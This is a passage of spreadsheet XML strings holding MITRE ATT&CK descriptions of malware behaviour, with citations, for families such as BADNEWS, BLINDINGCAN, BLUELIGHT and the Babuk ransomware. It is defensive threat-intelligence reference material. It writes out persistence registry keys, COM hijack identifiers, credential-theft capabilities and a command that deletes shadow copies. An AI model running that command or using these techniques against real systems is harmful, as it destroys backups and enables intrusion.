  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has captured victim computer name, memory space, and CPU details.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has captured victim IP address details.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has delayed communication to the actor-controlled IP address by 5 minutes.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) monitors USB devices and copies files with certain extensions to a predefined directory.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) can use multiple C2 channels, including RSS feeds, Github, forums, and blogs.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) typically loads its DLL file into a legitimate signed Java or VMware executable.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>After encrypting C2 data, [BADNEWS](https://attack.mitre.org/software/S0128) converts it into a hexadecimal representation and then encodes it into base64.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>When it first starts, [BADNEWS](https://attack.mitre.org/software/S0128) crawls the victim's local drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>When it first starts, [BADNEWS](https://attack.mitre.org/software/S0128) crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) copies files with certain extensions from USB devices to
a predefined directory.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) collects C2 information via a dead drop resolver.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) identifies files with certain extensions from USB devices, then copies them to a predefined directory.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) is capable of downloading additional files through C2 channels, including a new version of itself.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>When it first starts, [BADNEWS](https://attack.mitre.org/software/S0128) spawns a new thread to log keystrokes.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) copies documents under 15MB found on the victim system to is the user's &lt;code&gt;%temp%\SMB\&lt;/code&gt; folder. It also copies files from USB devices to a predefined directory.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) attempts to hide its payloads using legitimate filenames.(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) has a command to download an .exe and execute it via CreateProcess API. It can also run with ShellExecute.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) checks for new hard drives on the victim, such as USB devices, by listening for the WM_DEVICECHANGE window message.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) has a command to download an .exe and use process hollowing to inject it into a new process.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) installs a registry Run key to establish persistence.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) creates a scheduled task to establish by executing a malicious payload every subsequent minute.(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) has a command to take a screenshot and send it to the C2 server.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) encodes C2 traffic with base64.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) encrypts C2 data with a ROR by 3 and an XOR by 0x23.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) establishes a backdoor over HTTP.(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) is capable of executing commands via cmd.exe.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to decrypt AES encrypted payloads.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to download files from C2 to the infected host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to use the &lt;code&gt;CreatePipe&lt;/code&gt; API to add a sub-process for execution via [cmd](https://attack.mitre.org/software/S0106).(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) can extract a malicious Portable Executable (PE) from a photo.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to use [cmd](https://attack.mitre.org/software/S0106) to run a Portable Executable (PE) on the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can compress data with ZLIB prior to sending it back to the C2 server.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) has been seen persisting via COM hijacking through replacement of the COM object for MruPidlList &lt;code&gt;{42aedc87-2188-41fd-b9a3-0c966feabec1}&lt;/code&gt; or Microsoft WBEM New Event Subsystem &lt;code&gt;{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}&lt;/code&gt; depending on the system's CPU architecture.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>DLL side-loading has been used to execute [BBSRAT](https://attack.mitre.org/software/S0127) through a legitimate Citrix executable, ssonsvr.exe. The Citrix executable was dropped along with [BBSRAT](https://attack.mitre.org/software/S0127) by the dropper.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) uses [Expand](https://attack.mitre.org/software/S0361) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can delete files and directories.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can list file and directory information.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can list running processes.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) has been seen loaded into msiexec.exe through process hollowing to hide its execution.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the Registry Run key location &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ssonsvr.exe&lt;/code&gt;.</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can start, stop, or delete services.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) uses a custom encryption algorithm on data sent back to the C2 server over HTTP.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can query service configuration information.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can modify service configurations.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) uses SSL for encrypting C2 communications.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) malware contains a secondary fallback command and control server that is contacted after the primary command and control server.(Citation: Mandiant APT1)(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to download a file from the C2 server.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) can capture keystrokes.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to enumerate running processes and identify their owners.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to periodically take screenshots of the system.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to collect the processor type, operation system, computer name, uptime, and whether the system is a laptop or PC.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to gather the username from the system.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to launch a command shell on the system.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to launch a malicious process.(Citation: TrendMicro Tropic Trooper Mar 2018)</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload files from a compromised host.(Citation: Microsoft BITSAdmin)</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload and/or download files.(Citation: Microsoft BITSAdmin)</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload and/or download files from SMB file servers.(Citation: Microsoft About BITS)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has also obfuscated its C2 traffic as normal traffic to sites such as Github.(Citation: FireEye APT17)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) uses Microsoft’s TechNet Web portal to obtain a dead drop resolver containing an encoded tag with the IP address of a command and control server.(Citation: FireEye APT17)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to delete files.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to enumerate files.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) uses Microsoft’s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server and then communicates separately with that IP address for C2. If the C2 server is discovered or shut down, the threat actors can update the encoded IP address on TechNet to maintain control of the victims’ machines.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to discover processes.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to create a reverse shell.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has been signed with code-signing certificates such as CodeRipper.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t xml:space="preserve"> [BLINDINGCAN](https://attack.mitre.org/software/S0520) has uploaded files from victim machines.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has used AES and XOR to decrypt its DLLs.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has sent user and system information to a C2 server via HTTP POST requests.(Citation: NHS UK BLINDINGCAN Aug 2020)(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has deleted itself and associated artifacts from victim machines.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) can search, read, write, move, and execute files.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has downloaded files to a victim machine.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has lured victims into executing malicious macros embedded within Microsoft Office documents.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has attempted to hide its payload by using legitimate file names such as "iconcache.db".(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has obfuscated code using Base64 encoding.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has used Rundll32 to load a malicious DLL.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has loaded and executed DLLs in memory during runtime on a victim machine.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has been packed with the UPX packer.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has been delivered by phishing emails containing malicious Microsoft Office documents.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has encoded its C2 traffic with Base64.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has encrypted its C2 traffic with RC4.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has collected from a victim machine the system name, processor information, OS version, and disk information, including type and free space available.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has collected the victim machine's local IP address information and MAC address.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has modified file and directory timestamps.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has used HTTPS over port 443 for command and control.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has executed commands via cmd.exe.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can zip files before exfiltration.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) has encoded data into a binary blob using XOR.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can use different cloud providers for its C2.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect passwords stored in web browers, including Internet Explorer, Edge, Chrome, and Naver Whale.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) has exfiltrated data over its C2 channel.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can uninstall itself.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can enumerate files and collect associated metadata.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[BLUELIGHT](https://attack.mitre.org/software/S0657) can download additional files onto the host.(Citation: Volexity InkySquid BLUELIGHT August 2021) </t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) has a XOR-encoded payload.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect process filenames and SID authority level.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) has captured a screenshot of the display every 30 seconds for the first 5 minutes after initiating a C2 loop, and then once every five minutes thereafter.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect a list of anti-virus products installed on a machine.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can harvest cookies from Internet Explorer, Edge, Chrome, and Naver Whale browsers.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can check to see if the infected machine has VM tools running.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) has collected the computer name and OS version from victim machines.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect IP information from the victim’s machine.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect the username on a compromised host.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>[BLUELIGHT](https://attack.mitre.org/software/S0657) can collect the local time on a compromised host.(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[BLUELIGHT](https://attack.mitre.org/software/S0657) can use HTTP/S for C2 using the Microsoft Graph API.(Citation: Volexity InkySquid BLUELIGHT August 2021) </t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) can use DNS and TXT records within its DNS tunneling protocol for command and control.(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) uses a DGA to communicate with command and control servers.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) uses &lt;code&gt;-windowstyle hidden&lt;/code&gt; to conceal a [PowerShell](https://attack.mitre.org/techniques/T1059/001) window that downloads a payload.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) can download or upload files from its C2 server.(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) is written in PowerShell.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) persists using a scheduled task that executes every minute.(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) can read batch commands in a file sent from its C2 server and execute them with cmd.exe.(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has been signed by a valid CA.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has exploited the loading of the legitimate Dwrite.dll file by actually loading the gdi library, which then loads the gdiplus library and ultimately loads the local Dwrite dll.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[BOOSTWRITE](https://attack.mitre.org/software/S0415) has used a a 32-byte long multi-XOR key to decode data inside its payload.(Citation: FireEye FIN7 Oct 2019)	</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has encoded its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit Initialization vector (IV) to evade detection.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has used the DWriteCreateFactory() function to load additional modules.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[BOOTRASH](https://attack.mitre.org/software/S0114) is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.(Citation: Mandiant M Trends 2016)(Citation: FireEye Bootkits)(Citation: FireEye BOOTRASH SANS)</t>
  </si>
  <si>
    <t>[BOOTRASH](https://attack.mitre.org/software/S0114) has used unallocated disk space between partitions for a hidden file system that stores components of the Nemesis bootkit.(Citation: FireEye Bootkits)</t>
  </si>
  <si>
    <t>[BS2005](https://attack.mitre.org/software/S0014) uses Base64 encoding for communication in the message body of an HTTP request.(Citation: Mandiant Operation Ke3chang November 2014)</t>
  </si>
  <si>
    <t>[BUBBLEWRAP](https://attack.mitre.org/software/S0043) can communicate using SOCKS.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[BUBBLEWRAP](https://attack.mitre.org/software/S0043) collects system information, including the operating system version and hostname.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[BUBBLEWRAP](https://attack.mitre.org/software/S0043) can communicate using HTTP or HTTPS.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) can use ChaCha8 and ECDH to encrypt data.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Medium Babuk February 2021)(Citation: Trend Micro Ransomware February 2021)</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) has the ability to unpack itself into memory using XOR.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: Medium Babuk February 2021)</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) can stop anti-virus services on a compromised host.(Citation: Sogeti CERT ESEC Babuk March 2021)</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) has the ability to enumerate files on a targeted system.(Citation: McAfee Babuk February 2021)(Citation: Trend Micro Ransomware February 2021)</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) has the ability to delete shadow volumes using &lt;code&gt;vssadmin.exe delete shadows /all /quiet&lt;/code&gt;.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) can use multiple Windows API calls for actions on compromised hosts including discovery and execution.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Medium Babuk February 2021)</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) has the ability to enumerate network shares.(Citation: Sogeti CERT ESEC Babuk March 2021)</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) has the ability to check running processes on a targeted system.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Trend Micro Ransomware February 2021)</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) can stop specific services related to backups.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Trend Micro Ransomware February 2021)</t>
  </si>
  <si>
    <t>Versions of [Babuk](https://attack.mitre.org/software/S0638) have been packed.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Medium Babuk February 2021)</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) can enumerate disk volumes, get disk information, and query service status.(Citation: McAfee Babuk February 2021)</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) can use “WNetOpenEnumW” and “WNetEnumResourceW” to enumerate files in network resources for encryption.(Citation: McAfee Babuk February 2021)</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) can enumerate all services running on a compromised host.(Citation: McAfee Babuk February 2021)</t>
  </si>
  <si>
    <t>[Babuk](https://attack.mitre.org/software/S0638) has the ability to use the command line to control execution on compromised hosts.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has the ability to decode downloaded files prior to execution.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has cleaned up all files associated with the secondary payload execution.(Citation: Unit42 BabyShark Apr 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[BabyShark](https://attack.mitre.org/software/S0414) has used &lt;code&gt;dir&lt;/code&gt; to search for "programfiles" and "appdata".(Citation: Unit42 BabyShark Feb 2019)	</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has downloaded additional files from the C2.(Citation: Unit42 BabyShark Apr 2019)(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has a [PowerShell](https://attack.mitre.org/techniques/T1059/001)-based remote administration ability that can implement a PowerShell or C# based keylogger.(Citation: Unit42 BabyShark Apr 2019)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has used mshta.exe to download and execute applications from a remote server.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t xml:space="preserve">[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;tasklist&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;reg query&lt;/code&gt; command for &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&lt;/code&gt;.(Citation: Unit42 BabyShark Feb 2019)	</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has added a Registry key to ensure all future macros are enabled for Microsoft Word and Excel as well as for additional persistence.(Citation: Unit42 BabyShark Feb 2019)(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has used scheduled tasks to maintain persistence.(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has encoded data using [certutil](https://attack.mitre.org/software/S0160) before exfiltration.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;ver&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)	</t>
  </si>
  <si>
